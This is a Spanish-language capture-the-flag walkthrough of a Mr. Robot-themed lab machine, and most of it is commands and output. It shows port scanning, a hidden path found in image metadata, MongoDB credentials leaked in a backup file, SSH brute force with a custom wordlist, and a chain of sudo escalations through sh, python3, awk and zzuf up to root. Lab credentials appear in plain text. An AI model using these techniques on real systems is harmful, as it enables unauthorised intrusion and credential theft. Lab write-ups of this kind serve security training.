Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.69❯ nmap -sCV -p 22,80,27017 -oN 02-targeted.txt 192.168.1.98
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-08-18 18:06 -04
Nmap scan report for 192.168.1.98
Host is up (0.00032s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-server-header: Apache/2.4.56 (Debian)
|_http-title: Hello Friend
27017/tcp open mongodb MongoDB 5.0.21
| mongodb-databases:
| errmsg = command listDatabases requires authentication
| codeName = Unauthorized
| code = 13
|_ ok = 0.0
| fingerprint-strings:
| FourOhFourRequest, GetRequest:
| HTTP/1.0 200 OK
| Connection: close
| Content-Type: text/plain
| Content-Length: 85
| looks like you are trying to access MongoDB over HTTP on the native driver port.
| mongodb:
| errmsg
| command serverStatus requires authentication
| code
| codeName
|_ Unauthorized
| mongodb-info:
| MongoDB Build info
| bits = 64
| javascriptEngine = mozjs
| sysInfo = deprecated
| version = 5.0.21
| storageEngines
| 0 = devnull
| 2 = wiredTiger
| 1 = ephemeralForTest
| openssl
| compiled = OpenSSL 1.1.1n 15 Mar 2022
| running = OpenSSL 1.1.1n 15 Mar 2022
| debug = false
| modules
| maxBsonObjectSize = 16777216
| ok = 1.0
| allocator = tcmalloc
| buildEnvironment
| ccflags = -Werror -include mongo/platform/basic.h -ffp-contract=off -fasynchronous-unwind-tables -ggdb -Wall -Wsign-compare -Wno-unknown-pragmas -Winvalid-pch -fno-omit-frame-pointer -fno-strict-aliasing -O2 -march=sandybridge -mtune=generic -mprefer-vector-width=128 -Wno-unused-local-typedefs -Wno-unused-function -Wno-deprecated-declarations -Wno-unused-const-variable -Wno-unused-but-set-variable -Wno-missing-braces -fstack-protector-strong -Wa,--nocompress-debug-sections -fno-builtin-memcmp
| distarch = x86_64
| target_arch = x86_64
| cxx = /opt/mongodbtoolchain/v3/bin/g++: g++ (GCC) 8.5.0
| target_os = linux
| cppdefines = SAFEINT_USE_INTRINSICS 0 PCRE_STATIC NDEBUG _XOPEN_SOURCE 700 _GNU_SOURCE _FORTIFY_SOURCE 2 BOOST_THREAD_VERSION 5 BOOST_THREAD_USES_DATETIME BOOST_SYSTEM_NO_DEPRECATED BOOST_MATH_NO_LONG_DOUBLE_MATH_FUNCTIONS BOOST_ENABLE_ASSERT_DEBUG_HANDLER BOOST_LOG_NO_SHORTHAND_NAMES BOOST_LOG_USE_NATIVE_SYSLOG BOOST_LOG_WITHOUT_THREAD_ATTR ABSL_FORCE_ALIGNED_ACCESS
| distmod = debian10
| linkflags = -Wl,--fatal-warnings -pthread -Wl,-z,now -fuse-ld=gold -fstack-protector-strong -Wl,--no-threads -Wl,--build-id -Wl,--hash-style=gnu -Wl,-z,noexecstack -Wl,--warn-execstack -Wl,-z,relro -Wl,--compress-debug-sections=none -Wl,-z,origin -Wl,--enable-new-dtags
| gitVersion = 4fad44a858d8ee2d642566fc8872ef410f6534e4
| versionArray
| 0 = 5
| 3 = 0
| 2 = 21
| 1 = 0
| Server status
| errmsg = command serverStatus requires authentication
| codeName = Unauthorized
| code = 13
|_ ok = 0.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.34 secondsEn el sitio web encontramos una imagen de Mr. Robot. La analizamos y sus metadatos filtran una ruta oculta:
❯ exiftool image_01.jpg
...
Comment : B4ckUp_3LLi0t/
...Enumeramos esa ruta con gobuster y damos con un archivo de respaldo:
❯ gobuster dir -u 'http://192.168.1.98/B4ckUp_3LLi0t/' -w ~/Documents/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html,jpg,jpeg,png,bak,zip -r
...
/index.html (Status: 200) [Size: 481]
/image.jpg (Status: 200) [Size: 689302]
/connect.bak (Status: 200) [Size: 266]
...Descargamos connect.bak, que contiene las credenciales de conexión a MongoDB:
❯ wget http://192.168.1.98/B4ckUp_3LLi0t/connect.bak
❯ cat connect.bak
<?php
$client = new MongoDB\Client(
'mongodb://127.0.0.1:27017'
[
'username' => 'mongo',
'password' => 'm0ng0P4zz',
'ssl' => true,
'replicaSet' => 'myReplicaSet',
'authSource' => 'admin',
'db' => 'elliot',
],
);Nos conectamos a MongoDB y extraemos los datos personales del usuario elliot:
❯ mongo --host 192.168.1.98 --port 27017 -u 'mongo' -p 'm0ng0P4zz' elliot
> show collections
elliot
> db.elliot.find()
{ "_id" : ObjectId("651fdd9171f44c265b976d17"), "FirstName" : "Elliot", "Surname" : "Alderson", "Nickname" : "MrRobot", "Birthdate" : "17091986" }Con esos datos generamos un diccionario personalizado con cupp:
❯ cupp -i
...
> First Name: Elliot
> Surname: Alderson
> Nickname: MrRobot
> Birthdate (DDMMYYYY): 17091986
...Y hacemos fuerza bruta contra SSH:
❯ hydra -l elliot -P elliot.txt 192.168.1.98 ssh -t 64
...
[22][ssh] host: 192.168.1.98 login: elliot password: toillE71986
...Nos conectamos con elliot:toillE71986 y obtenemos la primera flag:
❯ ssh elliot@192.168.1.98
elliot@192.168.1.98's password: toillE71986
elliot@robot:~$La escalada de privilegios es una cadena de saltos sudo entre usuarios, cada uno con un binario distinto permitido. Empezamos con elliot, que puede ejecutar sh como darlene:
elliot@robot:~$ sudo -l
Matching Defaults entries for elliot on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User elliot may run the following commands on robot:
(darlene) NOPASSWD: /usr/bin/sh
elliot@robot:/home$ sudo -u darlene /usr/bin/sh
$ whoami
darlenedarlene puede ejecutar python3 como angela:
darlene@robot:~$ sudo -l
Matching Defaults entries for darlene on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User darlene may run the following commands on robot:
(angela) NOPASSWD: /usr/bin/python3
darlene@robot:~$ sudo -u angela python3 -c 'import os; os.system("/bin/bash")'
angela@robot:/home/darlene$angela puede ejecutar awk como tyrell:
angela@robot:~$ sudo -l
Matching Defaults entries for angela on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User angela may run the following commands on robot:
(tyrell) NOPASSWD: /usr/bin/awk
angela@robot:~$ sudo -u tyrell awk 'BEGIN {system("/bin/bash")}'
tyrell@robot:/home/angela$Y tyrell puede ejecutar zzuf como root, con el que lanzamos bash y obtenemos la última flag:
tyrell@robot:~$ sudo -l
Matching Defaults entries for tyrell on robot:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User tyrell may run the following commands on robot:
(root) NOPASSWD: /usr/bin/zzuf
tyrell@robot:~$ sudo -u root /usr/bin/zzuf /usr/bin/bash
whoami
rootFin.